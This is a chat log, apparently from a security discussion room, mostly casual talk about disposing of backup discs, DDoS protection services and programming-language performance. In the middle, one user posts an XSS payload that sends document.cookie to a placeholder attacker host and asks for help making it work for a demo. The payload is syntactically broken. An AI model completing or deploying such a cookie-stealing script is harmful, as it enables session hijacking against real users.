I have old CDs/DVDs which have some backups, these backups have some work and personal files. I always had a problem when I needed to destroy them (physically) to make sure no one will reuse them.
Breaking them is dangerous, pieces could fly fast and may cause harm. Scratching them badly is wha...
@AviD That's the problem when dealing with people who have more money than they can count: every time you tell them that they're dumb, they give you less of their money.
Can anyone help? I want protection from DDOS attacks, and protection from known 'dodgy' visitors. I believe CloudFlare does this, but does New Relic (as I also want some of the things New Relic offers too)?
So I'll use both, but AviD says "you want to have a relationship with both of them, at the same time? That's very brave of you" - so what does that mean?
@user2143356 Ehh...He's probably just alluding to the fact that relationships with enterprise software companies in general can be less fun than, oh, poking out your eyes with a pencil.
actually I was thinking what @Xander said, but I figured I didnt know better, so I stayed offtopic.
@Xander actually, I was making a subtle reference to the fact that relationships with enterprise software companies in general can be compared to certain deviant romantic relationships.
@Griffin The language is nice; it has a lot of cool features, but I think it imports some of the most confusing aspects of perl which affects maintainability and readibility.
hello guys, iam preparing a demo of how to inject code into web applications and i have a problem with this xss: test<script>var i=new image; i.src='http://attackerssite.local/'document.cookie;</script>
For performance, you get 3 main groups: native compiled (e.g. C) is fastest, VM complied [C#, Java] is slower, but still fast, and then interpreted [Ruby, Python, Perl] is slowest.
@AviD Because it's not needed (unless it's something mission critical then it's needed). Like why waste resources when you can do something a different way but more efficiently.
@Griffin Rapid dev allows you to get something running fast, which you then profile to find our inefficiencies. Premature optimization is the root of all evil, remember?
It did note "In practice, it is often necessary to keep performance goals in mind when first designing software, but the programmer balances the goals of design and optimization."
> We should forget about small efficiencies, say about 97% of the time: premature optimization is the root of all evil. Yet we should not pass up our opportunities in that critical 3%.
@AviD thanks for your help avid, i tried to get it work but my editor isnt printing a helpful error msg :( can you plz tell me where the problem is? i tried 'http......'+document.cookie; but it didnt work
Clean code is not necessarily exclusive with fast-executing code. Normally difficult-to-read code was written because it was quicker to write, not because it executes any faster.
Writing "dirty" code in an attempt to make it faster is arguably unwise, since you don't know for certain that your c...
@AviD Typically the result of previous profiling that you know about. You implement a python regex library in C because you know that a state machine in C is significantly faster than one in a higher-level language.
@Griffin D is a great language if only as an example to others in how not to design a language. It tries to be everything to everyone and as a result is used by no one.
@tylerl similar to PHP, except for the last detail.
PHP is a great language if only as an example to others in how not to design a language. It tries to be everything to everyone - and yet it is used by oh so many.
@Griffin I use primarily Python right now. Not a fan of how it plays fast-and-loose with types, but it's slightly better supported on many systems than Ruby, and I'm not really a fan of Rails.